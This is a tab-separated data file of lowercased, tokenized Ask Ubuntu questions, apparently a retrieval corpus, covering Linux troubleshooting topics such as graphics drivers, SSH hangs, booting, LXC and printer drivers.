344807	can not find import ; dll may be missing , corrupt , or wrong version . wine kernel32.dll error ?	i 'm trying to install hard drive wiping software that was written for windows . i have downloaded wine and get through most of the installation process until the program tries to open . it is here where i receive the error message : can not find import ; dll may be missing , corrupt , or wrong version file `` kernel32.dll '' , function `` deletevoloumepointw '' ( error 0 ) is there any way to fix this ? any suggestions are appreciated , thanks .
344808	bumblebee + intel hd graphics + geforce gt 555m + unity / compiz problem	i have a mx14r1 alienware and i am using ubuntu 13.04 raring with unity 7.0 . i try to install bumblebee to use optimus technology with my nvidia card but didnt work . i am trying to run compiz-fusion or/and unity 3d but both crash when i try to view . what is the right way to install all the drivers/bumblebee and how can i setup the xorg.conf to run nvidia card instead the intel hd graphics ? i am not worry with power saving and other kind of stuff . ( i need to clean up my older instalation files of bumblebee ? ) thanks all ! !
344817	ubuntu 13.04 . after installing fglrx i only see the ubuntu wallpaper with no icons	i 've just installed ubuntu 13.04 and did upgrade all system . and then i did apt-get install fglrx fglrx-amdcccle and sudo reboot . when reboot was done i saw only the wallpaper from desktop . so i opened the terminal using ctrl+alt+t and did su and password , and did apt-get purge fglrx fglrx-amdcccle as i thought the installation of the ati driver was making trouble , but after the second reboot the problem was still there . ubuntu was working just fine before i installed fglrx . the system is a hp pavilion entertainment pc dv5 64-bit 2 gb ram . i installed ubuntu 13.04 32-bit . i am using win7 , linux mint 15 and ubuntu 13.04 . if more information is needed just ask and it will be provided . i should say that my laptop has ati mobility radeon hd 3450/3470 edit.. i booted 13.04 and and provided the username and password , but i kept going in a loop in and out . so i thought i got caps lock on so i toggled it off , but then it told me it was the wrong password . i did this several times without being able to logon to the system . so i was not able to run the commands : sudo dpkg-reconfigure lightdm sudo dpkg-reconfigure -a
344820	lubuntu - start program without using terminal	i just installed lubuntu 12.04 on a laptop . it is for my father and has to be user friendly . so i need a way to start programs graphically like by the `` start button '' equivalent to windows . the default programs are listed in the start menu , but i just installed wine and can not find it in the menu . where can i find programs that are not listed without using the terminal ? is there an equivalent to the ubuntu dash ?
344821	the disk drive for / is not ready yet or not present - file system read only	introduction same problem was faced by others and so all ready they are 3 questions all most same as this one but two of them were not answered at all and one which got response has no proper answer . so i am putting the question and it will be 4th question of the 'same ' type . i am hoping for some help . the problem i lost the admin password , so i tried fixing it by entering into netroot . did it successfully . then started updating through command do-update ( or something similar to this ) . it was taking a long time and here i did a mistake by forcefully putting the system of the time i restarted it screen showed : *the disk drive for / is not ready yet or not present continue to wait or press s to skip mounting or m for mannual recovery . * i pressed m. now after a lot of research , i did following steps : dpkg -- configure -a result : unable to access dpkg status area : read only file system i did : mount -o -remount , rw/ but it did n't help . mount -n -o remount , rw/dev/sda1 ... did n't help . sudo mount - remount/dev/sda1 ... did n't help . then : $ mount/greap sda1 bash : dev /sda1 permission denied then : $ mount /dev/sda1 -o remount , exec mount point sda1 does not exist then : $ sudo mkdir { sda1 , sda2 , sda5 , sda6 } mkdir : can not create directory sda1 : read only file system . now i am stuck . i need help . please provide with some answer which will help me to `` mount '' this read only file system ! i am updating this question from a different pc . i need to correct this problem in 8 hours before the diseased machined will be asked for ( by other students ) , so please , help as earliest . : )
344822	how to connect a projector to my ubuntu laptop ?	i am wondering if someone knows how i can connect my laptop with ubuntu 12.04 to a projector . i tried all the fn + f3 to f10 is still not working . this a dual boot : if i switch to windows it works perfectly but would not work with ubuntu .
344828	boot problem 13.04 ipv6	if i boot my ubuntu 13.04 this happens . it just stops booting . if i go in recovery mode and boot out of that it just behaves normal . do you guys have any suggestion how to fix this ? i got a dualboot ubuntu gnome 13.04 and windows 7 64bit [ 26.562497 ] ppdev : user-space parallel port driver [ 27.599325 ] init : anacron main process ( 1562 ) killed by term signal [ 28.184183 ] ipv6 : addrconf ( netdev_up ) : wlan0 : link is not ready [ 28.188804 ] ipv6 : addrconf ( netdev_up ) : wlan0 : link is not ready [ 28.198195 ] atl1c 0000:05:00.0 : irq 56 for msi/msi-x [ 28.214485 ] ipv6 : addrconf ( netdev_up ) : eth0 : link is not ready [ 28.217379 ] ipv6 : addrconf ( netdev_up ) : eth0 : link is not ready [ 30.185594 ] wlan0 : authenticate with c0 : c1 : c0:4e : b6:69 [ 30.198102 ] wlan0 : send auth to c0 : c1 : c0:4e : b6:69 ( try 1/3 ) [ 30.203255 ] wlan0 : authenticated [ 30.203475 ] ath9k 0000:03:00.0 wlan0 : disabling ht/vht due to wep/tkip use [ 30.204974 ] wlan0 : associate with c0 : c1 : c0:4e : b6:69 ( try 1/3 ) [ 30.208521 ] wlan0 : rx assocresp from c0 : c1 : c0:4e : b6:69 ( capab=0x411 status=0 aid=1 ) [ 30.208806 ] wlan0 : associated [ 30.208815 ] ipv6 : addrconf ( netdev_change ) : wlan0 : link becomes ready
344829	why wol do n't boot my system anymore ?	a few days ago i managed wakeonlan to work on my pc , i was able to turn it on via lan successfully . i installed ethtool , run ethtool -s eth0 wol g , checked that wake-on : g was displayed with ethtool eth0 , shut it down , wake from another pc in the same lan with wakeonlan xx : xx : xx : xx : xx : xx . everything was fine and the sun was shining . now , it does n't work anymore and i did n't changed anything , at least i do n't remember i had.i suppose there is no problem with sending the packet since i can see the magic packet broadcast over the lan with wireshark , i set a mac binding in the router anyway , just to be sure . i also tried to send the packet with wakeonlan -i 192.168.0.166 xx : xx : xx : xx : xx : xx , the ip is static . nothing . is it possible that the packet is not arriving when the computer is turned off ? i have no idea what the problem is , i would really appreciate any suggestion ... !
344830	horizontal lines in chrome developer tools while scrolling	anyone seeing colorful horizontal lines when scrolling in chrome developer tools ? i posted more info and a screenshot to the chrome product form here a while back but posting here as well in case this looks familiar . is it a video card issue ? the lines do n't happen in any other app ( firefox in various modes , ... ) .
344831	how to access geolocation information on ubuntu touch ?	it 's strangely hard to find any documentation on accessing geolocation information for ubuntu touch specifically and even qt5 more generally . the qt mobility apis provided this in qt4 , and they seem to have been split into separate libraries in qt5 . these libraries were apparently removed from the qt 5 distribution and are now considered optional add-on modules . as they are now `` add-ons , '' the qt website does n't seem to publish their documentation anymore . there are ubuntu packages for them , but installing the sdk does n't actually pull them in . so it is unclear if they will be available on the phone or not . the correct package seems to be qtdeclarative5-qtlocation-plugin , which can be accessed in qml with import qtlocation 5.0 trying to simply get latitude and longitude has been an exercise in futility . looking at older qt4 docs , i tried : import qtquick 2.0 import qtlocation 5.0 positionsource { id : src updateinterval : 1000 active : true onpositionchanged : { var coord = src.position.coordinate ; console.log ( `` coordinate : '' , coord.longitude , coord.latitude ) ; } } sadly , this just segfaults ... so my question , simply stated , is how can you access geolocation information on ubuntu touch in qml ?
344834	evince document viewer - failed to execute child process `` nemo '' ( permission denied )	i 've recently migrated from nautilus to nemo . i 've been reading a pdf and selected file > open containing folder option . this message appeared : failed to execute child process `` nemo '' ( permission denied ) why did this happen ? what can i do ?
344835	why were multi touch trackpad gestures removed from 13.04 ?	i have an asus zenbook ux31a and multi touch gestures worked great on 12.10 , but after i upgraded to 13.04 every gesture stopped working , except for 2 , 3 and 4 finger taps ( the 3 finger tapped changed function , though ) . according to this comment on launchpad the gestures were removed by design , but no other explanation is provided . what is the reason for removing trackpad gestures ?
344838	ubuntu 12.04 having strange issue with wpa2/enterprise	i 'm pretty new to ubuntu and i 'm not sure that i 'm going to state all the necessary information , so please do n't hesitate to ask me for more . i 'm running ubuntu 12.04 lts on my dell latitude e5430 . my wireless card is a bcm4313 802.11bgn . at my university i 've got a strange issue with the wireless network . they use wpa2/entrprise with peap authentication . these are the specific settings that i 'm using based on what they said on their support website : security : wpa & wpa2 enterprise authentication : protected eap peap ) anonymous identity : [ blank ] inner authentication : mschapv2 username : [ ] password : [ ] i found this related article and followed the steps listed with no luck . the strange thing is that i get a valid ip address , but when i open a browser and try to go to a website it will just sit there until it times out . update i ended up trying to update to 13.04 ( which i love by the way ) hoping it would alleviate the problem . unfortunately , i 'm still having the same issue . hopefully someone can help , thanks !
344840	missing files on shared ntfs partition	i 'm somewhat new to ubuntu . i have set my laptop up with a dual boot win8/ubuntu 12.04 each with their own partition and a third empty data partition with the intention of working on files between the two operating systems . after copying some files to the data partition in ubuntu and then rebooting into a hibernating windows 8 the files had disappeared . i tried repairing the file system in windows 8 and the folder containing the files reappeared however the files themselves are no longer there . how do i start going about diagnosing this problem ? it 's critical for me that the files on the data partition are stable , should i consider not using ntfs and forget sharing the files between the two operating systems ?
344841	running a command as soon as i save a file	i want to run a command as soon as i save a specific text file . i know how to do it when the file closes , but i am looking for the code to execute as soon as i hit ctrl+s . thanks in advance..
344842	ubuntu 12.04 lts or 13.04 will not boot from cd	i 've tried loading ubuntu 12.04 lts and 13.04 from cd/dvd ( both 32bit versions ) on to an older laptop , i end up getting a green/lilac horizontal lined screen , then have to reboot the laptop , and it reboots to windows . laptop configuration : acer 1355xc 14.1 xga tft amd athlon-m 2600+ 256 ddr sdram 30gb hdd it originally came with windows xp , at the moment i 've just installed vista business , which is running extremely slow , so wanted to try ubuntu . images :
344844	i do n't understand why this is happening ?	i just installed ubuntu , it boots and then i get stuck there : ( problem shown link given below : ubuntu log in problem
344845	can i install samba while running on liveusb ?	i 'm brand new to ubuntu . i loaded ubuntu 12.04 on a usb stick so that i could use the terminal to fix a problem with my android phone . when i try to install samba , i get this message : the following packages have unmet dependencies : samba : depends : samba-common ( = 2:3.6.3-2ubuntu2 ) but 2:3.6.3-2ubuntu2.6 is to be installed depends : libwbclient0 ( = 2:3.6.3-2ubuntu2 ) but 2:3.6.3-2ubuntu2.6 is to be installed recommends : tdb-tools but it is not going to be installed e : unable to correct problems , you have held broken packages . is it because i 'm trying to do this before installing ubuntu , just running it from the usb ? or is there another problem that i 'm missing ? please help ! thanks in advance .
344848	dual boot ubuntu ( gpt bios disk ) and win 7 ( mbr disk ) [ solved ]	i have a new msi motherboard ( uefi ) , being used in uefi+legacy mode , with two disks , one ubuntu ( primary disk - gpt with bios_grub flag on ) and windows 7 in the 2nd disk ( mbr partition ) . and i 'm having trouble booting win 7 from grub2 , ubuntu boots fine . if windows 7 disk is the only one in the motherboard , it boots fine ( well after repairing it ) , but not in the two disk configuration . it 's been days now searching all over , i 've tried boot-repair , i 've edited the windows entry in the grub menu ( using ntldr ( $ root ) /bootmgr ) but no luck . so my question is , is the ubuntu gpt partitioned disk an issue here , `` confusing '' win 7 , even though it is working in compatibility mode ( bios_grub flag on ) ? and how can i boot win 7 from grub2 ? thanks . -- update . after much tinkering i found the culprit - one of the data disks ( old ide ) uses an ide- > sata converter which works only in master mode , ( using a jumper on the converter itself ) , and this mode causes the windows 7 ( on another disk ) to not boot , btw the motherboard has only sata ports , no ide . so i 'm left with no options , either use this ide disk or use win 7 , but not both . whereas ubuntu boots fine in any possible disks ' configuration . so i might just go replace this ide disk with another genuine sata disk and be done with it .
344850	practical number of concurrent lxc limit on one node	is there any practical limit on the number of concurrent lxc containers to run on one box . obviously , this depend on the node spec ( cpu , ram , .. ) but really what i am wondering is the cost of running a process directly on the os vs running the same process in dedicated container on the same box ? if you have to put a number on the overheard difference , what is that over head ? is this a good way to figure out the maximum number of lxc container you should run on one server ?
344853	yawcam for ubuntu	i want to share video stream from my webcam . i use yawcam on my win pc . is there a similar program for ubuntu ?
344854	running a database in lxc	if you need to run your databases in lxc , what happen to your data files ? do you have access to the data file on the host os ? i guess the processes show up in the gust os process but who about the the files given that lxc has its own file system ? any other consideration to run your db inside lxc ?
344856	saving a large file across multiple dvds	do any of the dvd writers give the user an opportunity to use additional dvds until the project being backed up is completed .
344858	what is the use for /etc/default/* when daemonizing a process	i have some configuration files under /etc/default and one of them is for a service that should be started at boot so i changed the configuration file to say : start=yes but i have scripts in /etc/rc ? .d/ and /etc/init.d/ for it to start . so what is the use of the file under /etc/default/ directory ?
344862	is it possible to trace the add-relation hooks in debug-hooks window ?	is it possible to trace the add-relation hooks in debug-hooks window ? are there particular environmental variables i need to set to be successful ? my juju-core version is 1.13.3 . i want to observe the cloud-compute-relation-changed hook in action since i see this failure when trying to add-relation between nova-cloud-controller and nova-compute : amcet:2013-09-12 20:18:39 info juju context.go:221 worker/uniter : hook getaddrinfo xxn79 : name or service not known amcet:2013-09-12 20:18:39 info juju server.go:105 worker/uniter/jujuc : running hook tool `` juju-log '' [ `` nova-cloud-controller error : nova-cloud-controller : could n't obtain ssh host key from xxn79 . '' ] amcet:2013-09-12 20:18:39 debug juju server.go:106 worker/uniter/jujuc : hook context id `` nova-cloud-controller/0 : cloud-compute-relation-changed:4369123461286104487 '' ; dir `` /var/lib/juju/agents/unit-nova-cloud-controller-0/charm '' amcet:2013-09-12 20:18:39 info juju juju-log.go:64 nova-cloud-controller/0 cloud-compute:32 : nova-cloud-controller error : nova-cloud-controller : could n't obtain ssh host key from xxn79 . amcet:2013-09-12 20:18:39 error juju uniter.go:352 worker/uniter : hook failed : exit status 1 amcet:2013-09-12 20:18:39 debug juju modes.go:412 worker/uniter : modeabide exiting amcet:2013-09-12 20:18:39 info juju modes.go:410 worker/uniter : modehookerror starting i see no real meaningful output from the debug-hooks window when executing .
344863	ssh new connection begins to hang ( not reject or terminate ) after a day or so on ubuntu 13.04 server	recently we upgraded the server from 12.04 lts server to 13.04 . all was well , including after a reboot . with all packages updated we began to see a strange issue , ssh works for a day or so ( unclear on timing ) then a later request for ssh hangs ( can not ctrl+c , nothing ) . it is up and serving webserver traffic etc . port 22 is open ( ips etc altered slightly for posting ) : nmap -t4 -a x.acme.com starting nmap 6.40 ( http : //nmap.org ) at 2013-09-12 16:01 cdt nmap scan report for x.acme.com ( 69.137.56.18 ) host is up ( 0.026s latency ) . rdns record for 69.137.56.18 : c-69-137-56-18.hsd1.tn.provider.net not shown : 998 filtered ports port state service version 22/tcp open ssh openssh 6.1p1 debian 4 ( protocol 2.0 ) | ssh-hostkey : 1024 54 : d3 : e3:38:44 : f4:20 : a4 : e7:42:49 : d0 : a7 : f1:3e:21 ( dsa ) | 2048 dc:21:77:3b : f4:4e:74 : d0:87:33:14:40:04:68:33 : a6 ( rsa ) |_256 45:69:10:79:5a:9f:0b : f0:66:15:39:87 : b9 : a1:37 : f7 ( ecdsa ) 80/tcp open http jetty 7.6.2.v20120308 | http-title : log in as a bamboo user - atlassian bamboo |_requested resource was http : //x.acme.com/userlogin ! default.action ; jsessionid=19v135zn8cl1tgso28fse4d50 ? os_destination= % 2fstart.action service info : os : linux ; cpe : cpe : /o : linux : linux_kernel service detection performed . please report any incorrect results at http : //nmap.org/submit/ . nmap done : 1 ip address ( 1 host up ) scanned in 12.89 seconds here is the ssh -vvv : ssh -vvv x.acme.com openssh_5.9p1 , openssl 0.9.8x 10 may 2012 debug1 : reading configuration data /users/tfergeson/.ssh/config debug1 : reading configuration data /etc/ssh_config debug1 : /etc/ssh_config line 20 : applying options for * debug2 : ssh_connect : needpriv 0 debug1 : connecting to x.acme.com [ 69.137.56.18 ] port 22. debug1 : connection established . debug3 : incorrect rsa1 identifier debug3 : could not load `` /users/tfergeson/.ssh/id_rsa '' as a rsa1 public key debug1 : identity file /users/tfergeson/.ssh/id_rsa type 1 debug1 : identity file /users/tfergeson/.ssh/id_rsa-cert type -1 debug1 : identity file /users/tfergeson/.ssh/id_dsa type -1 debug1 : identity file /users/tfergeson/.ssh/id_dsa-cert type -1 debug1 : remote protocol version 2.0 , remote software version openssh_6.1p1 debian-4 debug1 : match : openssh_6.1p1 debian-4 pat openssh* debug1 : enabling compatibility mode for protocol 2.0 debug1 : local version string ssh-2.0-openssh_5.9 debug2 : fd 3 setting o_nonblock debug3 : load_hostkeys : loading entries for host `` x.acme.com '' from file `` /users/tfergeson/.ssh/known_hosts '' debug3 : load_hostkeys : found key type rsa in file /users/tfergeson/.ssh/known_hosts:10 debug3 : load_hostkeys : loaded 1 keys debug3 : order_hostkeyalgs : prefer hostkeyalgs : ssh-rsa-cert-v01 @ openssh.com , ssh-rsa-cert-v00 @ openssh.com , ssh-rsa debug1 : ssh2_msg_kexinit sent debug1 : ssh2_msg_kexinit received debug2 : kex_parse_kexinit : diffie-hellman-group-exchange-sha256 , diffie-hellman-group-exchange-sha1 , diffie-hellman-group14-sha1 , diffie-hellman-group1-sha1 debug2 : kex_parse_kexinit : ssh-rsa-cert-v01 @ openssh.com , ssh-rsa-cert-v00 @ openssh.com , ssh-rsa , ssh-dss-cert-v01 @ openssh.com , ssh-dss-cert-v00 @ openssh.com , ssh-dss debug2 : kex_parse_kexinit : aes128-ctr , aes192-ctr , aes256-ctr , arcfour256 , arcfour128 , aes128-cbc,3des-cbc , blowfish-cbc , cast128-cbc , aes192-cbc , aes256-cbc , arcfour , rijndael-cbc @ lysator.liu.se debug2 : kex_parse_kexinit : aes128-ctr , aes192-ctr , aes256-ctr , arcfour256 , arcfour128 , aes128-cbc,3des-cbc , blowfish-cbc , cast128-cbc , aes192-cbc , aes256-cbc , arcfour , rijndael-cbc @ lysator.liu.se debug2 : kex_parse_kexinit : hmac-md5 , hmac-sha1 , umac-64 @ openssh.com , hmac-sha2-256 , hmac-sha2-256-96 , hmac-sha2-512 , hmac-sha2-512-96 , hmac-ripemd160 , hmac-ripemd160 @ openssh.com , hmac-sha1-96 , hmac-md5-96 debug2 : kex_parse_kexinit : hmac-md5 , hmac-sha1 , umac-64 @ openssh.com , hmac-sha2-256 , hmac-sha2-256-96 , hmac-sha2-512 , hmac-sha2-512-96 , hmac-ripemd160 , hmac-ripemd160 @ openssh.com , hmac-sha1-96 , hmac-md5-96 debug2 : kex_parse_kexinit : none , zlib @ openssh.com , zlib debug2 : kex_parse_kexinit : none , zlib @ openssh.com , zlib debug2 : kex_parse_kexinit : debug2 : kex_parse_kexinit : debug2 : kex_parse_kexinit : first_kex_follows 0 debug2 : kex_parse_kexinit : reserved 0 debug2 : kex_parse_kexinit : ecdh-sha2-nistp256 , ecdh-sha2-nistp384 , ecdh-sha2-nistp521 , diffie-hellman-group-exchange-sha256 , diffie-hellman-group-exchange-sha1 , diffie-hellman-group14-sha1 , diffie-hellman-group1-sha1 debug2 : kex_parse_kexinit : ssh-rsa , ssh-dss , ecdsa-sha2-nistp256 debug2 : kex_parse_kexinit : aes128-ctr , aes192-ctr , aes256-ctr , arcfour256 , arcfour128 , aes128-cbc,3des-cbc , blowfish-cbc , cast128-cbc , aes192-cbc , aes256-cbc , arcfour , rijndael-cbc @ lysator.liu.se debug2 : kex_parse_kexinit : aes128-ctr , aes192-ctr , aes256-ctr , arcfour256 , arcfour128 , aes128-cbc,3des-cbc , blowfish-cbc , cast128-cbc , aes192-cbc , aes256-cbc , arcfour , rijndael-cbc @ lysator.liu.se debug2 : kex_parse_kexinit : hmac-md5 , hmac-sha1 , umac-64 @ openssh.com , hmac-sha2-256 , hmac-sha2-512 , hmac-ripemd160 , hmac-ripemd160 @ openssh.com , hmac-sha1-96 , hmac-md5-96 debug2 : kex_parse_kexinit : hmac-md5 , hmac-sha1 , umac-64 @ openssh.com , hmac-sha2-256 , hmac-sha2-512 , hmac-ripemd160 , hmac-ripemd160 @ openssh.com , hmac-sha1-96 , hmac-md5-96 debug2 : kex_parse_kexinit : none , zlib @ openssh.com debug2 : kex_parse_kexinit : none , zlib @ openssh.com debug2 : kex_parse_kexinit : debug2 : kex_parse_kexinit : debug2 : kex_parse_kexinit : first_kex_follows 0 debug2 : kex_parse_kexinit : reserved 0 debug2 : mac_setup : found hmac-md5 debug1 : kex : server- > client aes128-ctr hmac-md5 none debug2 : mac_setup : found hmac-md5 debug1 : kex : client- > server aes128-ctr hmac-md5 none debug1 : ssh2_msg_kex_dh_gex_request ( 1024 < 1024 < 8192 ) sent debug1 : expecting ssh2_msg_kex_dh_gex_group debug2 : dh_gen_key : priv key bits set : 130/256 debug2 : bits set : 503/1024 debug1 : ssh2_msg_kex_dh_gex_init sent debug1 : expecting ssh2_msg_kex_dh_gex_reply debug1 : server host key : rsa dc:21:77:3b : f4:4e:74 : d0:87:33:14:40:04:68:33 : a6 debug3 : load_hostkeys : loading entries for host `` x.acme.com '' from file `` /users/tfergeson/.ssh/known_hosts '' debug3 : load_hostkeys : found key type rsa in file /users/tfergeson/.ssh/known_hosts:10 debug3 : load_hostkeys : loaded 1 keys debug3 : load_hostkeys : loading entries for host `` 69.137.56.18 '' from file `` /users/tfergeson/.ssh/known_hosts '' debug3 : load_hostkeys : found key type rsa in file /users/tfergeson/.ssh/known_hosts:6 debug3 : load_hostkeys : loaded 1 keys debug1 : host 'x.acme.com ' is known and matches the rsa host key . debug1 : found key in /users/tfergeson/.ssh/known_hosts:10 debug2 : bits set : 493/1024 debug1 : ssh_rsa_verify : signature correct debug2 : kex_derive_keys debug2 : set_newkeys : mode 1 debug1 : ssh2_msg_newkeys sent debug1 : expecting ssh2_msg_newkeys debug2 : set_newkeys : mode 0 debug1 : ssh2_msg_newkeys received debug1 : roaming not allowed by server debug1 : ssh2_msg_service_request sent debug2 : service_accept : ssh-userauth debug1 : ssh2_msg_service_accept received debug2 : key : /users/tfergeson/.ssh/id_rsa ( 0x7ff189c1d7d0 ) debug2 : key : /users/tfergeson/.ssh/id_dsa ( 0x0 ) debug1 : authentications that can continue : publickey debug3 : start over , passed a different list publickey debug3 : preferred publickey , keyboard-interactive , password debug3 : authmethod_lookup publickey debug3 : remaining preferred : keyboard-interactive , password debug3 : authmethod_is_enabled publickey debug1 : next authentication method : publickey debug1 : offering rsa public key : /users/tfergeson/.ssh/id_rsa debug3 : send_pubkey_test debug2 : we sent a publickey packet , wait for reply debug1 : server accepts key : pkalg ssh-rsa blen 277 debug2 : input_userauth_pk_ok : fp 3c : e5:29:6c:9d:27 : d1:7d : e8:09 : a2 : e8:8e:6e : af:6f debug3 : sign_and_send_pubkey : rsa 3c : e5:29:6c:9d:27 : d1:7d : e8:09 : a2 : e8:8e:6e : af:6f debug1 : read pem private key done : type rsa debug1 : authentication succeeded ( publickey ) . authenticated to x.acme.com ( [ 69.137.56.18 ] :22 ) . debug1 : channel 0 : new [ client-session ] debug3 : ssh_session2_open : channel_new : 0 debug2 : channel 0 : send open debug1 : requesting no-more-sessions @ openssh.com debug1 : entering interactive session . debug2 : callback start debug2 : client_session2_setup : id 0 debug2 : fd 3 setting tcp_nodelay debug2 : channel 0 : request pty-req confirm 1 debug1 : sending environment . debug3 : ignored env atlas_opts debug3 : ignored env rvm_bin_path debug3 : ignored env term_program debug3 : ignored env gem_home debug3 : ignored env shell debug3 : ignored env term debug3 : ignored env clicolor debug3 : ignored env irbrc debug3 : ignored env tmpdir debug3 : ignored env apple_pubsub_socket_render debug3 : ignored env term_program_version debug3 : ignored env my_ruby_home debug3 : ignored env term_session_id debug3 : ignored env user debug3 : ignored env command_mode debug3 : ignored env rvm_path debug3 : ignored env com_google_chrome_framework_service_process/users/tfergeson/library/application_support/google/chrome_socket debug3 : ignored env jpda_address debug3 : ignored env apdk_home debug3 : ignored env ssh_auth_sock debug3 : ignored env apple_ubiquity_message debug3 : ignored env __cf_user_text_encoding debug3 : ignored env rvm_sticky_flag debug3 : ignored env maven_opts debug3 : ignored env lscolors debug3 : ignored env rvm_prefix debug3 : ignored env path debug3 : ignored env pwd debug3 : ignored env java_home debug1 : sending env lang = en_us.utf-8 debug2 : channel 0 : request env confirm 0 debug3 : ignored env jpda_transport debug3 : ignored env rvm_version debug3 : ignored env m2_home debug3 : ignored env home debug3 : ignored env shlvl debug3 : ignored env rvm_ruby_string debug3 : ignored env logname debug3 : ignored env m2_repo debug3 : ignored env gem_path debug3 : ignored env aws_rds_home debug3 : ignored env rvm_delete_flag debug3 : ignored env ec2_private_key debug3 : ignored env ruby_version debug3 : ignored env securitysessionid debug3 : ignored env ec2_cert debug3 : ignored env _ debug2 : channel 0 : request shell confirm 1 debug2 : callback done debug2 : channel 0 : open confirm rwindow 0 rmax 32768 i can hard reboot ( only mac monitors at that location ) and it will again be accessible . this now happens every single time . it is imperative that i get it sorted . the strange thing is that it behaves initially then starts to hang after several hours . i perused logs previously and nothing stood out . from the auth.log , i can see that it has allowed me in , but still i get nothing back on the client side : sep 20 12:47:50 cbear sshd [ 25376 ] : accepted publickey for tfergeson from 10.1.10.14 port 54631 ssh2 sep 20 12:47:50 cbear sshd [ 25376 ] : pam_unix ( sshd : session ) : session opened for user tfergeson by ( uid=0 ) updates : still occurring even after setting usedns no and commenting out # session optional pam_mail.so standard noenv this does not appear to be a network/dns related issue , as all services running on the machine are as responsive and accessible as ever , with the exception of sshd . any thoughts on where to start ?
344865	how to install a deb.tar.gz file ?	i have a canon mg2220 multifunction printer that i would like to use with ubuntu 13.04 ( which i just installed ) . there are no print drivers available in the ubuntu software center , so i downloaded some linux drivers from canon 's asia website . they are : scangearmp-mg2200series-2.00-1-deb.tar.gz cnijfilter-mg2200series-3.80-1-deb.tar.gz i have found how to install `` .tar.gz '' files , but this one has `` .tar.gz '' in front of the `` .deb '' , and i am concerned about doing anything that may screw up my system . can i use the same method for installing `` .deb.tar.gz '' as `` .tar.gz '' by following these instructions i found on ask ubuntu ?
344866	how can i encrypt a file with the serpent encryption algorithm ?	i would like to encrypt a file using a symmetric key algorithm . aes is a common algorithm , but i do n't quite trust it , and i heard that serpent is a very strong alternative . how can i encrypt/decrypt a file with serpent , preferably through a command line ?
344875	running a .run file ?	when i ran to nvidia 's website to download their 64bit linux drivers , it downloaded a file named `` nvidia-linux-x86_64-319.49.run '' . since this was n't a file extension i 'd seen before , i assumed double clicking would do nothing ( incorrect ; it actually tried opening it in a word processor which hilariously meets with a crashed word processor ) . i installed new drivers through a terminal . for future reference , however , assuming this is an archive , and clearly nvidia expects everyone to be able to crack it open on command , how would i go about making the .run file actually be useful ? was there a command to decompress it and install the drivers ? was it a script and i just have no idea how to execute it ? ( very new to linux ; ubuntu 's my first attempt at running a distro since ... oh , redhat 6.something . anyways , so much for context . )
344878	journal software that works	i am working on a book and two computer programs . the amount of time i spend dealing with how everything is organized makes the amount of time i spend writing negligible . my requirements : hierarchical organization . needs export to document , pdf , or preferably html . rich text editing with support for tables and inserting images . installing from terminal or deb file only . the following would be a real plus : support for free hand drawing/writing . files in a format that can be read in other programs ( xml , txt , html , etc . ) notes can open in separate windows .
344885	what will be the power backend for ( k ) ubuntu 13.10 ?	i have kubuntu 13.04 installed . kde uses powerdevil to manage hibernate/sleep , which in turns seems to use pm-utils backend . pm-utils is unmaintained , and broken at this point1 . for example , i had to jump through many hoops to just enable in-kernel hybrid suspend which has been present since kernel 3.6 . i asked on freenode # kde , and it seems like kde powerdevil has been modified to accept newer backends for a while now . the order of preference is roughly systemd-login1 , upower , and solid . does anyone know what power backed will *buntu 13.10 use ? 1 the pm-utils code was last updated in 2010 , and they have not been accepting patches .
344891	how to change nautilus to show `` file system '' instead of `` computer '' ?	nautilus use to have the label for the file system in it 's tree as `` file system '' . recently that was changed to now show `` computer '' in the tree to open the file system . regardless of why this change was made , how do i change it back ?
344893	ardour will not continue to record .	i just recently bought a laptop . it has 5.2 gb of ram and 624.2 gb on the hard drive . however , after only a few minutes of playing into my midi keyboard i get an error message saying that `` this disk system on your computer was not able to keep up with ardour . specifically , it failed to write data to the disk quickly enough to keep up with the recording . '' is there a way that i can fix this ?
344899	repository on dvds for ubuntu likes debian	why ubuntu dont have all repository on dvds likes debian ? i downloaded 10 dvds from debian wheezy ... i 'm happy ... so i no need internet for install programs on my laptop or my student 's netbooks ... but i would like test ubuntu because it is more friendly for my students , and in my town we dont have internet connection because i ask you ubuntu 12.04 lts all repository on dvds links for download them ... thanks . p/d : sorry for my bad english ... i from argentina ...
344902	how to share displays through wifi	i have an lg smart tv with a wifi dongle and a notebook with ubuntu 13.04 . i 'd like to use my tv as a monitor but by wifi . does anyone know how to do this ? thanks in advance !
344903	install on a laptop with external monitor only	i am trying to install ubuntu on a dell inspiron 1545 which is using an external monitor ( lcd is broken ) . the external monitor is an aoc e950swn and the lcd is complety unpluged from the mobo , if that matters . i have and old ( 3 months ) installation in a hdd , and the grub shows up , but when i select ubuntu to boot the screen goes off saying there is no signal . i 've tryed installing from a usb . when booting i press f2 so it takes me to the advanced menu . there i have chosen `` nomodeset '' but all i see are some error messages related to the wireless card and then the screen goes off.if booted without `` nomodeset '' i ca n't even see the error messages . also tried installing on another laptop and passing the hdd , but still does n't work . if i log in recovery mode and try safe graphics mode all i get is a blinking console cursor . but if i log into a root console everything is there . my assumptions is that it tries to turn on the laptop 's lcd even if it is n't present , completely ignoring the external monitor . so , how can i tell it ( or force it ) to load the external monitor from startup ? or even when installing .
344905	how to install drivers for iogear smart card reader ?	i 'm still trying to learn how to use the terminal in 13.04 . i downloaded the linux drivers for the hardware and began reading the installation and immediately got lost . http : //www.iogear.com/support/dm/driver/gsr202 # display if anybody could help me out that would be great . i do n't know if the instructions are written with the files saved in a different location ( i extracted the folder to my desktop ) or if i am just completely lost .
344907	i 'm interested in trying out ubuntu . i installed 12.04 i386 on usb stick , but ca n't get it to boot	i am currently running windows 7 . i 'm not quite sure how to get this to boot into ubuntu . i have the usb stick in drive , and i restart the computer , but nothing changes . i tried f12 before the windows startup prompt , still nothing . i downloaded 12.04 i386 using the steps in `` pen drive usb linux 's installer '' on this site . i can go into `` devices '' and browse files on the usb , but i ca n't get the option to `` try ubuntu '' . what am i missing ? also , in the usb download , there was 12.04 i386 and 12.04 amd . what 's the difference ? what am i missing ? thanks .
